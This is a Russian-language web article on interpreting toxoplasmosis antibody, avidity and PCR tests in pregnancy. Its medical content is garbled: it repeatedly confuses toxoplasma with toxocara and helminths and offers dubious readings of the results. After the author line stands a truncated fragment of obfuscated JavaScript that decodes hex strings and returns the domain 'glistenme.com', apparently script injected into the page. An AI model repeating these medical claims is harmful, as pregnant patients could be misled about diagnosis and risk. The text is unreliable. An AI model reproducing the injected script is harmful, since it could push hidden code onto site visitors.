Токсоплазмоз у беременных

Статья
Фото
Анализ на токсоплазмоз при беременности, как и любой другой иммуноферментный анализ, предусматривает исследование показателей белков двух типов Im-M и Im-G. Наличие одних и отсутствие других говорит о том, на какой стадии находится заболевание, насколько высокой является угроза для организма матери и будущего ребенка, насколько долго человек способен бороться с токсоплазмозом при помощи собственных сил.

Сделать лабораторные анализы и получить полную их расшифровку на наличие токсокаров в теле будущей матери и плода можно практически в любой клинике. Отличаться будут только цена и показатели нормы – в каждой клинике последние, как правило, свои. Для сдачи анализа крови не нужно проходить предварительную подготовку – все равно только после одного анализа ни один врач не будет назначать лечение. Подобных анализов крови понадобится минимум два, после которых необходимо сдать дополнительный анализ, подтверждающий или опровергающий результаты предыдущего. И только после этого можно назначать лечение с учетом «интересного» положения, при котором можно применять довольно ограниченный круг препаратов (это связано с тем, что основная масса противогельминтных препаратов являются слишком токсичными, что опасно и для будущей матери, и плода).

Расшифровка, также как и непосредственно анализ на токсоплазмоз, делается практически в любой клинике. Предварительная подготовка к проведению процедуры для беременных не предусмотрена. В качестве исследовательского материала используется кровь и моча пациенток.

Токсоплазмоз при беременности

Что бы это значило?

  • Коротко о расшифровке

Речь идет о расшифровке полученных результатов. При постановке диагноза при помощи методики ИФА (иммуноферментного анализа) учитываются показатели белков двух типов Im-M и Im-G. Первые продуцируются иммунной системой молодой матери с первых дней заражения. Если в крови беременной женщины обнаружены белки Im-M, в теле присутствуют токсокары. Однако об их количестве и вероятности прогрессирования заболевания можно судить исключительно после получения показателей второго типа белков – Im-G. Последние начинают вырабатываться иммунной системой после того, как прошло два месяца с момента заражения. Высокие показатели этих белков в крови свидетельствуют о готовности функциональных систем собственными силами бороться с гельминтозом.

Как правило, концентрации белков Im-G снижаются после шести-восьми месяцев с момента заражения. Однако показатели ниже нормы вовсе не означают, что иммунная система больше не может бороться с недугом самостоятельно. Подобное снижение количества белков в крови свидетельствует о том, что большая их часть вступила во взаимодействие с другими белковыми структурами – личинками токсокаров или их взрослыми особями. Насколько серьезным является положение вещей и существует ли угроза для малыша можно судить по расшифровке показателей обоих типов белков.

Белки Im-М начинают вырабатываться с первых дней заражения и исчезают через шесть-восемь недель. После этого иммунная система беременных начинает вырабатывать белки Im-G, которые обеспечивают естественную защиту организма от гельминтов. Расшифровка показателей количества только обоих типов белков и сравнение их с нормой позволяет определить клиническую картину.

  • Как читаются показатели

Наличие показателей только одного типа белков само по себе не дает полного представления о серьезности заболевания. Только сопоставление количества обоих типов белков с нормой дает возможность установить точный диагноз.

Итак, показатели бывают следующими:

  • Если обоих типов белков в крови нет, гельминтов в организме тоже нет. Но обследоваться женщине нужно регулярно, поскольку естественная защита от гельминтов (речь идет о наличии белков Im-G) отсутствует.
  • Если в крови есть только белки Im-G, женщина в прошлом переболела гельминтозом, поэтому у нее уже имеется стойкая естественная защита от токсокаров. Подобным иммунитетом обладает около 60 % людей. Однако спешить радоваться не стоит – чтобы быть на 100 % уверенным в отсутствии опасности для собственного организма и организма будущего малыша, нужно сдать дополнительный анализ ПЦР, который позволяет дать более точный ответ на все вопросы.
  • Если в крови есть белки Im-М, а белков Im-G нет, значит, женщина только-только заразилась гельминтами. Естественно, что иммунитета к данному заболеванию у нее нет, поэтому риск заражения будущего ребенка крайне высок. Определить степень риска можно также при помощи методики ПЦР. Через две недели нужно снова сделать ИФА – к тому времени обычно в крови беременной появляются белки Im-G, свидетельствующие о наличие в организме резервов для самостоятельной борьбы с гельминтами.

Если в крови обнаружены оба типа белков, а их показатели находятся в норме, необходимо сдать повторный анализ ИФА. Возможно, наличие белков Im-М, обнаруженное при первой процедуре, было ошибочным. Бывают и другие случаи, когда женщина в прошлом уже лечилась от определенного типа гельминтоза, у нее уже имеется иммунитет (норма белков Im-G это подтверждает), а теперь она заразилась новыми гельминтами, против которых у нее нет иммунитета. В таком случае более точный диагноз может быть установлен при помощи методики ПЦР.

  • Коротко об авидности

Под авидностью понимают способность организма бороться собственными силами против определенных гельминтов. Чем выше показатель авидности, тем более высоким иммунитетом обладает женщина. Как правило, она ранее лечилась от такого же типа гельминтоза, поэтому опасность для будущего ребенка невысока. И, наоборот, чем ниже процент авидности (границы нормы устанавливает каждая клиника), тем выше риск для организма матери и плода.

Токсоплазмоз при беременности лечение

В процентном соотношении расшифровка показателей следующая: если авидность составляет 40 % и меньше, гельминтоз находится на начальной стадии. Для получения более точного диагноза нужно сдать анализ ПЦР. Если показатели авидности составляют 60 % и выше, женщина обладает высокой степенью естественной защиты, т.е. начальная стадия гельминтоза уже в прошлом. Однако при хроническом гельминтозе существуют свои источники опасности.

Авидность – дополнительный показатель белков крови, учитываемый при постановке диагноза. Он свидетельствует о наличии в организме белков, способный противостоять конкретному типу гельминтоза. Нормы авидности  устанавливаются в каждой клинике.

Методика ПЦР

Данная методика является дополнительной, к которой обычно прибегают после проведения иммуноферментного анализа. ПЦР позволяет опровергнуть или подтвердить наличие гельминтов в организме. Точность данного анализа примерно одинакова по сравнению с точность иммуноферментного анализа, однако стоимость ПЦР существенно выше. Как правило, все сомнения относительно разновидности гельминтоза, наличия или отсутствия в крови беременной защитных белков и степени риска для будущей матери и ребенка рассеиваются после проведения ПЦР через несколько недель после двух процедур иммуноферментного анализа.

Резюме. При постановке диагноза при беременности во внимание берутся не только показатели количества защитных белков в крови пациентки, но и их тип. Наличие одних белков и отсутствие других в крови говорит о том, на какой стадии находится заболевание. Дополнительно определяется еще один показатель – авидность, который свидетельствует о наличии в организме белков, способных противостоять определенному типу гельминтоза. Нормы авидности и расшифровку анализов можно найти на сайте клиник. Как правило, в каждой клинике они индивидуальны.

 Автор статьи: O.Задорожня.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "glistenme.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

(Пока оценок нет)
Загрузка...
Сообщить об опечатке
Текст, который будет отправлен нашим редакторам: